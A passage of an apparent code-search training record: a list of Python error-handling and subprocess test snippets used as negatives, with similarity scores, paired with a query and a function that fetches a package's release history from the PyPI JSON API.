errorMsg = errorMsg.getvalue()\n # On Windows, print statements output to the console window that is created minimized when Katana launches\n print( errorMsg )\n\n # Display a human-readable generic error message\n ShowModalDialog( \"Pipeline Tools Error\",\n \"Pipeline Tools encountered an error. Check the Katana console for more detailed information.\" )\n\n return \"Pipeline Tools Error\"", "def test_install_subprocess_error_should_fail(self, *args):\n manifest = self.generate_mock_manifest(cfg={\n EXTCFG_SECTION.INSTALL: {\n EXTCFG_OPTION.EXEC_EXT_CMD: ['command'],\n }\n })\n ext_manager = PkgInstExtrasManager(manifest)\n with pytest.raises(exceptions.InstExtrasManagerError):\n ext_manager.handle_install_extras()", "def procFail(proc):\n\tif 'a' in proc.config._notify.when['pipeline']:\n\t\tlogger.debug('Notifying process fails')\n\t\tEMAIL.send('proc', proc, 'abort')", "def test_args_bad_value(testapp, args, error):\n\n with pytest.raises(ValueError) as excinfo:\n next(archive.process(testapp, [], **args))\n assert str(excinfo.value) == error", "def test_exceptions_on_the_test(self):\n try:\n raise Exception(\"faki faki faki\")\n except Exception as e:\n #TODO: write a proper test to verify exception logging\n res = output(e, \"ERROR\")\n eq_(type(\"\"),type(res))\n eq_(\"GREAP ERROR faki faki faki\",res)\n eq_(True,mymock.called)", "def test_process_path(path):\n try:\n subprocess.call([path, \"--version\"])\n return True\n except:\n print(\"Cannot find executable on {}\".format(path))\n return False", "def test_start_process(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_process\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # patch the instance\n rpc._get_application_process = Mock()\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_process('strategy', 'appli:proc')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running process\n rpc._get_application_process.return_value = (\n None, Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc1'}))\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running processes\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n Mock(**{'running.return_value': False}),\n Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc2'})]}), None)\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc2', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped processes\n proc_1 = Mock(**{'running.return_value': False,\n 'stopped.return_value': True,\n 'namespec.return_value': 'proc1'})\n proc_2 = Mock(**{'running.return_value': False,\n 'stopped.return_value': False,\n 'namespec.return_value': 'proc2'})\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n proc_1, proc_2]}), None)\n # test RPC call with no wait and not done\n mocked_start.return_value = False\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call no wait and done\n mocked_start.return_value = True\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and done\n result = rpc.start_process(2, 'appli:*', wait=True)\n self.assertTrue(result)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_process(2, 'appli:*', wait=True)\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and process still stopped\n mocked_progress.return_value = False\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and process running\n proc_1.stopped.return_value = False\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def test_call(*args, **kwargs):\n try:\n subprocess.check_output(*args, **kwargs)\n return True\n except Exception:\n return False", "def test_ns_fail2():\n env = NsSimPyEnvironment()\n env.process(some_process(env, 4e-29))\n env.run()", "def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError(\"mocked error\")\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert not issues", "def shellExecErrorCode(cmd):\n return subprocess.call(cmd, shell=True)", "def test_check_if_error_one(self):\n with self.assertRaises(MyError):\n SshpassErrorExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def error_check(command):\r\n\r\n # TODO\r", "def test_DDSim_runIt_failure_inputFile(self):\n self.ddsim.platform = \"Windows\"\n self.ddsim.applicationLog = self.logFileName\n self.ddsim.InputFile = \"pairs.hepmc\"\n ## side effect for Script, log, logAfter\n with patch(\"os.path.exists\", new=Mock(side_effect=[False, False, True] ) ):\n res = self.ddsim.runIt()\n self.assertEqual( res['Message'], \"no pairs.hepmc\" )", "def _safe_call(cmd_list):\n try:\n subprocess.check_output(cmd_list)\n return True\n except subprocess.CalledProcessError as err_thrown:\n print('Error while calling \"%s\"', err_thrown.cmd)\n return False", "def test_does_not_crash(self):\n py_function(6)", "def prnt_error():\n print \"Error!\\n\"\n return False", "def errReceived(self, data):\n log.msg(\"Error output from process: \" + data,\n isError=True)", "def supercall(command):\n p = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE)\n retval = p.wait()\n \n if retval != 0:\n get_logger().critical('error calling {}'.format(command))\n for line in p.stderr.readlines():\n get_logger().critical(line.decode('utf8').replace('\\n', ''))\n\n return retval", "def test_has_receivers(error_report_mock):\n\n app_crash()\n error_report_mock.assert_not_called()\n\n signal('panic').connect(triage)\n app_crash()\n error_report_mock.assert_called_with()", "def test_command(self):\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, 'This script requires.*'):\r\n call_command('git_export', 'blah', 'blah', 'blah',\r\n stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)\r\n\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, 'This script requires.*'):\r\n call_command('git_export', stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)\r\n\r\n # Send bad url to get course not exported\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, GitExportError.URL_BAD):\r\n call_command('git_export', 'foo/bar/baz', 'silly',\r\n stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)\r\n # Send bad course_id to get course not exported\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, GitExportError.BAD_COURSE):\r\n call_command('git_export', 'foo/bar:baz', 'silly',\r\n stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)", "def test_cond_with_uncaught_error(env):\n def explode(env, delay):\n yield env.timeout(delay)\n raise ValueError(f'Onoes, failed after {delay}!')\n\n def process(env):\n yield env.timeout(1) | env.process(explode(env, 2))\n\n env.process(process(env))\n try:\n env.run()\n assert False, 'There should have been an exception.'\n except ValueError:\n pass\n assert env.now == 2", "def test_sandbox_errors_false(self):\n SignalHook(self.test_extension, self.signal, self._on_signal_exception,\n sandbox_errors=False)\n\n self.assertEqual(len(self._on_signal_exception.calls), 0)\n self.assertRaises(Exception, self.signal.send, self)\n self.assertEqual(len(self._on_signal_exception.calls), 1)", "def test_main_fails_on_request_error(\n runner: CliRunner, mock_requests_get: MockFixture\n) -> None:\n mock_requests_get.side_effect = Exception(\"Boom\")\n result = runner.invoke(console.main)\n assert result.exit_code == 1", "def test_example(self, _, cmd):\n out = subprocess.run(cmd, shell=True)\n self.assertFalse(out.returncode)", "def testIgnoredError(self):\n cmds = \"\"\"-chown 0 missingFile\npwd\nexit\n\"\"\"\n def _cbCheckResult(res):\n self.assertIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def test_exit_on_missing_file(self):\n with self.assertRaises(SystemExit):\n pyint = Interpreter()\n pyint.run(file=MISSING_FILE)", "def test_main_failure(logger, argv):\n assert app.main(argv) == 1\n logger.error.called_once()", "def test_check_process_output(self):\n workflow = self.get_workflow(\n \"\"\"file://result <- file://source\n echo test\n \"\"\")\n workflow.pre_check_processes()\n try:\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert False, \"Exception has not been not raised\"\n except ResourceError:\n assert True", "def error_handler(self):\n if self.ctx.exit_code is not None:\n return self.ctx.exit_code", "def test_removeProcessUnknownKeyError(self):\r\n self.pm.startService()\r\n self.assertRaises(KeyError, self.pm.removeProcess, \"foo\")", "def side_effect(command, stdout, stderr):\n if any('always-auth' in arg for arg in command):\n raise subprocess.CalledProcessError(\n returncode=1,\n cmd=command\n )\n\n return mock.DEFAULT", "def get_exit_code(self):", "def test_send_error_to_admin(self, process_mock, send_smtp_mock):\n # arrange an mock error during processing\n process_mock.side_effect = RuntimeError('mock error')\n\n with name_of_file_containing('contents') as filename:\n call_command('process_email', email_file=filename)\n\n self.assertTrue(send_smtp_mock.called)\n (msg,) = send_smtp_mock.call_args.args\n self.assertEqual(msg['to'], 'admin@example.com', 'Admins should be emailed on error')\n self.assertIn('error', msg['subject'].lower(), 'Error email subject should indicate error')\n self.assertTrue(msg.is_multipart(), 'Error email should have attachments')\n parts = msg.get_payload()\n self.assertEqual(len(parts), 3, 'Error email should contain message, traceback, and original message')\n content = parts[0].get_payload()\n traceback = parts[1].get_payload()\n original = parts[2].get_payload(decode=True).decode() # convert octet-stream to string\n self.assertIn('RuntimeError', content, 'Error type should be included in error email')\n self.assertIn('mock.py', content, 'File where error occurred should be included in error email')\n self.assertIn('traceback', traceback.lower(), 'Traceback should be attached to error email')\n self.assertEqual(original, 'contents', 'Original message should be attached to error email')", "def expect_failure(self):\n class StopCode(Exception):\n \"\"\"This exception will be raised instead of exiting the program.\"\"\"\n def __init__(self, exit_code):\n self.exit_code = exit_code\n\n def stop_code(arg):\n raise StopCode(arg)\n\n with mock.patch('sys.exit') as exit:\n exit.side_effect = stop_code\n try:\n with mock.patch('sys.stderr'):\n yield\n except StopCode as exc:\n self.assertTrue(exc.exit_code > 0)\n exit.assert_called()", "def test_sandbox_errors_true(self):\n SignalHook(self.test_extension, self.signal, self._on_signal_exception,\n sandbox_errors=True)\n\n self.assertEqual(len(self._on_signal_exception.calls), 0)\n self.signal.send(self)\n self.assertEqual(len(self._on_signal_exception.calls), 1)", "def errorCheck(sh, returncode, stderr):\n\tif returncode!=0 or stderr!='':\n\t\tif config.DEBUG:\n\t\t\tmsg = \"sh code execution [%s] returned non-zero exit status [%s] and/or non-empty stdterr [%s]\" % (repr(sh), returncode, repr(stderr.strip()))\n\t\telse:\n\t\t\tmsg = \"sh code execution returned non-zero exit status and/or non-empty stdterr\"\n\t\traise Exception(msg)", "def test_broken_error_descriptor(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def isfailure(self):\n\n return self.proc.returncode != 0", "def test_broken_error_module(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def test_process_id():\n output = sh.process_id()\n assert isinstance(output, int) and output > 0", "def script_test(path):\n log.info(\" ... EXECUTING {}\".format(str(path)))\n\n cmd = [sys.executable, str(path)]\n cp = subprocess.run(cmd, stderr=subprocess.PIPE)\n if cp.returncode:\n log.info(\" ... FAILED\")\n log.info(\" ___ TRACEBACK\")\n log.info(cp.stderr.decode(\"utf-8\") + \"\\n\\n\")\n return False\n else:\n log.info(\" ... PASSED\")\n return True", "def _check_error(return_value):\n if return_value < 0:\n raise IOError(pm.lib.Pm_GetErrorText(return_value))", "def test_handles_error(self):\n with self.assertRaises(ForcedExit):\n self.run_command(mkdtemp())\n\n self.assertResults(\n result_with_hint(\n u'This repository has not been initialized.',\n GIT_REPO_NOT_INITIALIZED),\n self.error)", "def test_NameError(n=2):\n\n p = platform_name()\n\n try:\n p.result()\n except NameError:\n print(\"Caught NameError\")\n else:\n assert False, \"Raise the wrong Error\"" ]
[ "0.66911113", "0.64319515", "0.63943857", "0.63668126", "0.6338667", "0.63044673", "0.63034093", "0.6283694", "0.62171775", "0.6183645", "0.61580575", "0.6093192", "0.6079444", "0.603348", "0.6027173", "0.5997922", "0.59800065", "0.59751534", "0.59546334", "0.5954266", "0.5952915", "0.5950407", "0.5940823", "0.5938315", "0.5936006", "0.5910566", "0.58934283", "0.58907115", "0.5888934", "0.5878262", "0.5869655", "0.5857681", "0.5855828", "0.58498514", "0.5837764", "0.58310163", "0.5826163", "0.5824052", "0.58215964", "0.58190316", "0.5811657", "0.5808997", "0.58084625", "0.580711", "0.57744235", "0.57393813", "0.5732496", "0.5724523", "0.57161075", "0.5712371", "0.5709087", "0.57071835", "0.57047236", "0.5691978", "0.5677486", "0.56693155", "0.5657402", "0.56558996", "0.565308", "0.5649697", "0.5647792", "0.5646234", "0.56461334", "0.5643843", "0.56422126", "0.56357884", "0.5632547", "0.562886", "0.5624747", "0.5613597", "0.56036216", "0.55999523", "0.5598975", "0.5593832", "0.5591292", "0.5583989", "0.55821043", "0.55819696", "0.5571361", "0.55705565", "0.5569407", "0.55691683", "0.55651265", "0.55651", "0.5559164", "0.55580276", "0.5557747", "0.5550513", "0.5548187", "0.55465066", "0.55371517", "0.5536441", "0.5534309", "0.5531631", "0.55276555", "0.5521732", "0.55160487", "0.5508824", "0.5502101", "0.5499891" ]
0.6745141
0
Get the release history from pypi Use the json API to get the release history from pypi. The returned json structure includes a 'releases' dictionary which has keys that are release numbers and the value is an array of uploaded files. While we don't have a 'release time' per say (only the upload time on each of the files), we'll consider the timestamp on the first source file found (which will be a .zip or tar.gz typically) to be 'release time'. This is inexact, but should be close enough for our purposes.
def get_releases_for_package(name, since): f = urlreq.urlopen("http://pypi.org/project/%s/json" % name) jsondata = f.read() data = json.loads(jsondata) releases = [] for relname, rellist in data['releases'].iteritems(): for rel in rellist: if rel['python_version'] == 'source': when = _parse_pypi_released(rel['upload_time']) # for speed, only care about when > since if when < since: continue releases.append( Release( name, relname, rel['filename'], when)) break return releases
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_releases():\n response = requests.get(PYPI_URL.format(package=PYPI_PACKAGE_NAME))\n if response:\n data = response.json()\n\n releases_dict = data.get('releases', {})\n\n if releases_dict:\n for version, release in releases_dict.items():\n release_formats = []\n published_on_date = None\n for fmt in release:\n release_formats.append(fmt.get('packagetype'))\n published_on_date = fmt.get('upload_time')\n\n release_formats = ' | '.join(release_formats)\n print('{:<10}{:>15}{:>25}'.format(version, published_on_date, release_formats))\n else:\n print('No releases found for {}'.format(PYPI_PACKAGE_NAME))\n else:\n print('Package \"{}\" not found on Pypi.org'.format(PYPI_PACKAGE_NAME))", "def versionHistory(self):\n url = self.metaData().getLink(\"version-history\")\n assert url is not None\n\n header = self._baseHeader.copy()\n response = self._adapter.getRequest(url, header)\n\n return json.loads(response['Body'])", "def get_current_release_downloads():\n downloads = (\n get_downloads_metadata()\n ['releases']\n [get_current_release()]\n ['downloads'])\n\n def up_to_date(dir, urls):\n try:\n df = pandas.read_csv(join(dir, \"DOWNLOAD_INFO.csv\"))\n return list(df.url) == list(urls)\n except IOError:\n return None\n\n return OrderedDict(\n (download[\"name\"], {\n 'downloaded': exists(join(get_downloads_dir(), download[\"name\"])),\n 'up_to_date': up_to_date(\n join(get_downloads_dir(), download[\"name\"]),\n [download['url']] if 'url' in download else download['part_urls']),\n 'metadata': download,\n }) for download in downloads\n )", "def Releases():\n return releases", "def releases(releaser, count):\n releases = sorted(\n releaser.get_releases().values(),\n key=lambda rel: rel[\"end_timestamp\"],\n reverse=True,\n )\n click.echo(f\"Latest {count} releases:\")\n for release in releases[:count]:\n click.echo(f'{release[\"end_timestamp\"]} {release[\"commit\"]}')", "def latest(data):\n result = dict()\n version = parse(\"0\")\n for release, info in data.items():\n python_version = Pypi._get_python_version(info)\n ver = parse(release)\n if not ver.is_prerelease:\n version = max(version, ver)\n python_version = python_version\n\n result = dict(version=str(version), python_version=python_version)\n\n return [result]", "def getCommitsSinceLastRelease(self):\n f = open(self.last_released, 'r')\n old_rev = f.read().replace('\\n', '')\n f.close()\n new_rev = commands.getoutput('cd '+self.proj_dir+' && git log -1 --format=%H')\n cmd = 'cd '+self.proj_dir+' && git log --no-merges --pretty=format:\"%s\" '+old_rev+'..'+new_rev\n unreleased_commits = commands.getoutput(cmd) \n print 'Commits since last release:'\n print unreleased_commits\n unreleased_commits = unreleased_commits.split('\\n')\n self.commit_msgs = unreleased_commits\n self.new_rev = new_rev", "def get_release_info():\n major_info = fetch_json(\n \"https://product-details.mozilla.org/1.0/\" \"firefox_history_major_releases.json\"\n )\n if major_info is None:\n raise Exception(\"Failed to fetch major version info\")\n minor_info = fetch_json(\n \"https://product-details.mozilla.org/1.0/\"\n \"firefox_history_stability_releases.json\"\n )\n if minor_info is None:\n raise Exception(\"Failed to fetch minor version info\")\n\n return {\"major\": major_info, \"minor\": minor_info}", "def get_release_info(self, version):\r\n try:\r\n return self._detail[\"releases\"][version]\r\n except KeyError as key_error:\r\n log.warning(key_error)\r\n return []", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def get_history(cls, api, history):\n api_base = api.split('/')[-1]\n cursor = cls.history_index.cursor()\n cursor.execute(\n \"select filename from history where api=? and ymdh=?;\",\n (api_base, history))\n files = [r[0] for r in cursor]\n cls.history_index.commit()\n if not files:\n return {}\n results = {}\n for fn in files:\n ts = re.split('[?@]', fn)[-1].replace('.gz', '')\n fn_full = os.path.join(config.base_store_dir, fn)\n fd = (gzip.open if fn.endswith('.gz') else open)(fn_full)\n results[ts] = json.load(fd, encoding='utf8')\n fd.close()\n return results", "def GetVersions(url, requestedProduct, requestedVersion):\n dictValidReleasesSorted = {}\n response = requests.get(url)\n if response.status_code == 200:\n jsonResult = response.json()\n jVersions = jsonResult[requestedProduct][\"versions\"]\n dictValidReleases = {}\n # do not want pre-releases; filter them out\n for item in jVersions.items(): \n for build in item[1][\"builds\"]:\n if (build[\"os\"] == SUPPORTED_OS):\n if (build[\"arch\"] == SUPPORTED_ARCH):\n if not (re.search('[a-zA-Z]', item[1][\"version\"])): \n dictValidReleases[item[1][\"version\"]] = build[\"url\"]\n\n for key in sorted(dictValidReleases,key=LooseVersion):\n dictValidReleasesSorted[key] = dictValidReleases[key]\n else:\n raise requests.ConnectionError(\"Server did not return status 200 - returned {0}\".format(response.status_code))\n\n return dictValidReleasesSorted", "def get_latest_tags(self):\n\n start = len(self.tags) - self.num_comparisons\n tags = self.tags\n latest = []\n for i in xrange(len(tags)):\n if i >= start:\n parts = tags[i]['ref'].split('/')\n release_num = parts[2]\n sha = tags[i]['object']['sha']\n tag = [release_num, sha]\n latest.append(tag)\n return latest", "def get_release(request):\r\n\r\n release = raven.fetch_git_sha(os.path.dirname(os.path.dirname(__file__)))\r\n return HttpResponse(json.dumps({\"release\": release[:7]}))", "def releases():\n r = run('ls -x %(releases_path)s' % env)\n env.releases = sorted(r.split(\"\\t\"))\n if len(env.releases) >= 1:\n env.current_revision = env.releases[-1]\n env.current_release = '%(releases_path)s/%(current_revision)s' % env\n if len(env.releases) > 1:\n env.previous_revision = env.releases[-2]\n env.previous_release = '%(releases_path)s/%(previous_revision)s' % env\n\n #cleanup old releases. max 3 allowed.\n cleanup()", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def _parse_latest_update(self, resp: Dict[str, Any], latest_version: str) -> str:\n latest_release = resp.get(\"releases\", {}).get(latest_version)\n if latest_release is not None and isinstance(latest_release, list):\n release_artifact_dates = []\n for artifact in latest_release:\n try:\n upload_time = artifact.get(\"upload_time_iso_8601\")\n parsed_upload_time = dateutil.parser.isoparse(upload_time)\n release_artifact_dates.append(parsed_upload_time)\n except Exception:\n pass\n latest_artifact_timestamp = max(release_artifact_dates)\n return latest_artifact_timestamp.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n return \"\"", "def get_version():\n parent_dir = os.path.dirname(os.path.realpath(__file__))\n while True:\n if '.git' in os.listdir(parent_dir):\n break\n parent_dir = os.path.dirname(parent_dir)\n git_log = os.path.join(parent_dir,'.git','logs','HEAD')\n handle = open(git_log,'r')\n log_lines = [l.split('\\t') for l in handle.readlines()]\n #now get latest github commit\n url = 'https://api.github.com/repos/thomasvangurp/epiGBS/commits'\n context = ssl._create_unverified_context()\n result = json.load(urllib.urlopen(url,context=context))\n print('')", "def get_released_versions(package_name):\n url = \"https://pypi.python.org/pypi/{}/json\".format(package_name)\n data = json.load(urllib.request.urlopen(url))\n\n versions = {\n # We can actually select any element in `dist_files` because all the distribution files\n # should have almost the same upload time.\n version: dist_files[0][\"upload_time\"]\n for version, dist_files in data[\"releases\"].items()\n # If len(dist_files) = 0, this release is unavailable.\n # Example: https://pypi.org/project/xgboost/0.7\n #\n # > pip install 'xgboost==0.7'\n # ERROR: Could not find a version that satisfies the requirement xgboost==0.7\n if len(dist_files) > 0 and (not dist_files[0].get(\"yanked\", False))\n }\n return versions", "def releases():\n result = run('ls %(releases_dir)s' % env)\n releases_list = re.split('\\s+', result)\n releases_list.sort(reverse=True)\n return releases_list", "def get_release_notes(self):\n\n notes = self.output.get_header('RELEASE NOTES')\n notes += 'https://{}/{}/{}/releases'.format(HOST_GITHUB, \\\n self.repo, self.product) + '\\n'\n\n notes += self.output.get_sub_header('COMPARISONS')\n notes += self.get_comparison(self.latest_tags[0][VERS],\n self.latest_tags[1][VERS])\n\n if len(self.latest_tags) >= (MAX_COMPARISONS_TO_SHOW - 1):\n notes += self.get_comparison(self.latest_tags[1][VERS],\n self.latest_tags[2][VERS])\n\n if len(self.latest_tags) >= MAX_COMPARISONS_TO_SHOW:\n notes += self.get_comparison(self.latest_tags[2][VERS],\n self.latest_tags[3][VERS])\n\n tag_data = self.get_tag(self.latest_tags[3][SHA])\n\n notes += self.output.get_sub_header('TAGS')\n notes += self.get_url_tag_release(self.latest_tags[3][VERS]) + '\\n'\n notes += self.get_url_tag_commit(tag_data[\"object\"][\"sha\"]) + '\\n'\n\n changelog = self.get_changelog(tag_data[\"object\"][\"sha\"])\n if changelog:\n notes += self.output.get_sub_header('CHANGELOG')\n notes += changelog\n return notes", "def get_release_info(version='v1.1-dev', date='2021-07-22'):\n # go to the repository directory\n dir_orig = os.getcwd()\n os.chdir(os.path.dirname(os.path.dirname(__file__)))\n\n # grab git info into string\n try:\n cmd = \"git describe --tags\"\n version = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n version = version.decode('utf-8').strip()\n\n # if there are new commits after the latest release\n if '-' in version:\n version, num_commit = version.split('-')[:2]\n version += '-{}'.format(num_commit)\n\n cmd = \"git log -1 --date=short --format=%cd\"\n date = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n date = date.decode('utf-8').strip()\n except:\n pass\n\n # go back to the original directory\n os.chdir(dir_orig)\n return version, date", "def get_version_and_release_date(\n requirement, version=None, verbose=False, response=None\n):\n if not response:\n url = get_pypi_url(requirement, version)\n response = request(url)\n\n # see if the url is 404'ing because it has been redirected\n if response.status == 404:\n root_url = url.rpartition(\"/\")[0]\n res = request(root_url, method=\"HEAD\")\n if res.status == 301:\n new_location = res.headers[\"location\"] + \"/json\"\n response = request(new_location)\n\n if response.status != 200:\n if version:\n if verbose:\n print(\n \"{} ({}) isn't available on PyPI \"\n \"anymore!\".format(requirement, version)\n )\n else:\n if verbose:\n print(\n \"{} isn't on PyPI. Check that the project \"\n \"still exists!\".format(requirement)\n )\n return None, None\n\n if not response.json:\n if verbose:\n print(\n \"Decoding the JSON response for {} ({}) \"\n \"failed\".format(requirement, version)\n )\n return None, None\n\n response = response.json\n\n try:\n if version:\n if version in response[\"releases\"]:\n release_date = response[\"releases\"][version][0][\"upload_time\"]\n else:\n return None, None\n else:\n version = response[\"info\"].get(\"stable_version\")\n\n if not version:\n versions = {\n v: parse_version(v)\n for v in response[\"releases\"].keys()\n if not parse_version(v).is_prerelease()\n }\n\n # if we still don't have a version, let's pick up a prerelease one\n if not versions:\n versions = {\n v: parse_version(v) for v in response[\"releases\"].keys()\n }\n\n if versions:\n version = max(versions.items(), key=operator.itemgetter(1))[0]\n release_date = response[\"releases\"][str(version)][0][\"upload_time\"]\n else:\n return None, None\n\n return version, datetime.fromtimestamp(\n time.mktime(time.strptime(release_date, \"%Y-%m-%dT%H:%M:%S\"))\n )\n except IndexError:\n if verbose:\n print(\"{} ({}) didn't return a date property\".format(requirement, version))\n return None, None", "def get_releases(is_vertebrate: bool):\n url = \"http://ftp.ensemblgenomes.org/pub?\"\n if is_vertebrate:\n url = \"http://ftp.ensembl.org/pub?\"\n ret = retry(requests.get, 3, url)\n # sort releases new to old\n releases = sorted(\n [int(i) for i in re.findall(r'\"release-(\\d+)/\"', ret.text)],\n reverse=True,\n )\n if is_vertebrate:\n # ignore immature releases\n releases = [r for r in releases if r > 46]\n return releases", "def api_json(self):\n if not self._api_json:\n resp = requests.get(\n GitHubManager.RELEASE_API.format(repo=self.repo)\n )\n if not resp.ok:\n resp.raise_for_status()\n\n self._api_json = resp.json()\n\n return self._api_json", "def certifiVersions():\n log = logger.new(function='certifiVersions')\n r = yield treq.get('https://pypi.python.org/pypi/certifi/json', timeout=5)\n log.msg(\"got certifi versions!\")\n data = yield r.json()\n\n # Note: this takes advantage of the fact that certifi's releases have the\n # same version number sort order as lexicographical. If that changes,\n # this will break.\n releases = sorted(data[u'releases'].keys())\n\n first_release = releases.index('14.05.14')\n target_versions = releases[first_release:]\n\n result = []\n for version in target_versions:\n files = data[u'releases'][version]\n\n # Find the .tar.gz release.\n for file in files:\n if file[u'filename'].endswith(u'.tar.gz'):\n break\n else:\n continue\n\n log.msg(\"new release located\", version=version, tarball=file[u'url'])\n result.append((version, file[u'url']))\n\n returnValue(result)", "def get_releases(repo, quiet=False, per_page=None) -> List[str]:\n req_url = f\"https://api.github.com/repos/{owner}/{repo}/releases\"\n\n params = {}\n if per_page is not None:\n if per_page < 1 or per_page > 100:\n raise ValueError(\"per_page must be between 1 and 100\")\n params[\"per_page\"] = per_page\n\n request = get_request(req_url, params=params)\n num_tries = 0\n while True:\n num_tries += 1\n try:\n with urllib.request.urlopen(request, timeout=10) as resp:\n result = resp.read()\n break\n except urllib.error.HTTPError as err:\n if err.code == 401 and os.environ.get(\"GITHUB_TOKEN\"):\n raise ValueError(\"GITHUB_TOKEN env is invalid\") from err\n elif err.code == 403 and \"rate limit exceeded\" in err.reason:\n raise ValueError(\n f\"use GITHUB_TOKEN env to bypass rate limit ({err})\"\n ) from err\n elif err.code in (404, 503) and num_tries < max_http_tries:\n # GitHub sometimes returns this error for valid URLs, so retry\n print(f\"URL request {num_tries} did not work ({err})\")\n continue\n raise RuntimeError(f\"cannot retrieve data from {req_url}\") from err\n\n releases = json.loads(result.decode())\n if not quiet:\n print(f\"found {len(releases)} releases for {owner}/{repo}\")\n\n 